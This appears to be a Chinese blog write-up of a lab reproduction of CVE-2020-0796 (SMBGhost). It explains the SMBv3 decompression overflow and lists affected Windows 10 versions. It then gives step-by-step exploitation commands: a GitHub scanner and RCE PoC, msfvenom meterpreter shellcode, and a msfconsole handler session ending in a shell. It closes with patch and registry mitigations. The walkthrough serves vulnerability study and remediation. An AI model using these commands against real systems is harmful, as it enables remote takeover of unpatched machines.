0x01 漏洞简介

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。

0x02 影响范围

漏洞不影响win7,漏洞影响Windows 10 1903之后的各个32位、64位版Windows,包括家用版、专业版、企业版、教育版。

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

SMB介绍

Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。

Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

0x03 复现步骤

环境要求

1.win10虚拟机(1903或者1909版本)

ip:192.168.5.131

这里给一个win10 1903版本的镜像

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

2.关闭defender和防火墙

3.Kali Linux(确保可以和win10虚拟机ping通)

ip:192.168.5.128

利用步骤

(1)首先检测目标是否存在漏洞,下载检测POC

https://github.com/ollypwn/SMBGhost

控制台输入python3 scanner.py <目标ip>来进行检测



发现存在漏洞

(2)然后下载利用poc

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

然后切换到对应目录下找到exploit.py



再找到这一段



(3)生成python的反弹shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o exp.py





然后将shellcode里的buf全部改成USER_PAYLOAD再将修改好的shellcode粘贴到exploit.py上我们刚才找到的位置,以便将获得的shell反弹到我们的kail上



(4)启动msfconsole,设置监听端口

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

payload => windows/x64/meterpreter/bind_tcp

msf5 exploit(multi/handler) > set rhost 192.168.5.145

rhost => 192.168.5.145

msf5 exploit(multi/handler) > set lport 1234

lport => 1234

msf5 exploit(multi/handler) > run

开启监听端口后,再去运行exploit.py

python3 exploit.py -ip 192.168.5.145



成功反弹shell,查看当前用户权限



注意:虽然这次成功了,但是这个rce的poc还不是很稳定,经常容易打蓝屏和死机。

本地提权

利用这个漏洞的还可以本地提权,就不赘述了。

http://www.fr1sh.com/?post=26

0x04 漏洞修复

1. 更新,完成补丁的安装。

操作步骤:设置­>更新和安全­>Windows更新,点击“检查更新”。

2.微软给出了临时的应对办法:

运行regedit.exe,打开注册表编辑器,在

HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为

DisableCompression的DWORD,值为1,禁止SMB的压缩功能。

3.对SMB通信445端口进行封禁。

4.补丁链接

https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762

最新文章

  1. 国内外前端(js)开发框架对比
  2. Oracle 11g系列:视图
  3. 手机打开PDF文档中文英文支持(乱码问题)解决攻略
  4. 关于web2py外网访问,图形界面不显示等问题的解决办法
  5. 转载.Net MVC中Html.RenderPartial和Html.RenderAction 的应用与区别
  6. CTE-递归[2]
  7. android Handler更新UI
  8. POJ1273 最大流 EK算法
  9. Effective C++ 第二版 1)const和inline 2)iostream
  10. subsets(子集)
  11. c++过程
  12. 工具方法 .js
  13. Select2 多层次赋值时异步赋值的问题
  14. 基于MNIST数据集使用TensorFlow训练一个包含一个隐含层的全连接神经网络
  15. lamp环境搭建之配置apache与fpm方式的php
  16. Jsp运行原理
  17. Linux下ip地址查询
  18. gcc 6.2.0/6.3.0/8.2.0 编译安装
  19. shell工具-sort
  20. Git 提交更改

热门文章

  1. mysql-kettle-superset电商可视化数据分析
  2. vue-cli 2.x 搭建项目
  3. eclipse 整合mybatis的过程
  4. 破坏之王DDoS攻击与防范深度剖析【学习笔记】
  5. vscode环境配置(三)——解决控制台终端中文输出乱码
  6. 模板:DOM常用场景【表单提交】——javascript结合HTML DOM(或者JQuery)运用
  7. wordpress评论回复邮件通知功能
  8. 面向对象案例-学生信息管理系统V0.6
  9. Pandas读取文件报错UnicodeDecodeError: &#39;utf-8&#39; codec can&#39;t decode byte 0xb6 in position 0: invalid start byte
  10. Longest Mountain in Array 数组中的最长山脉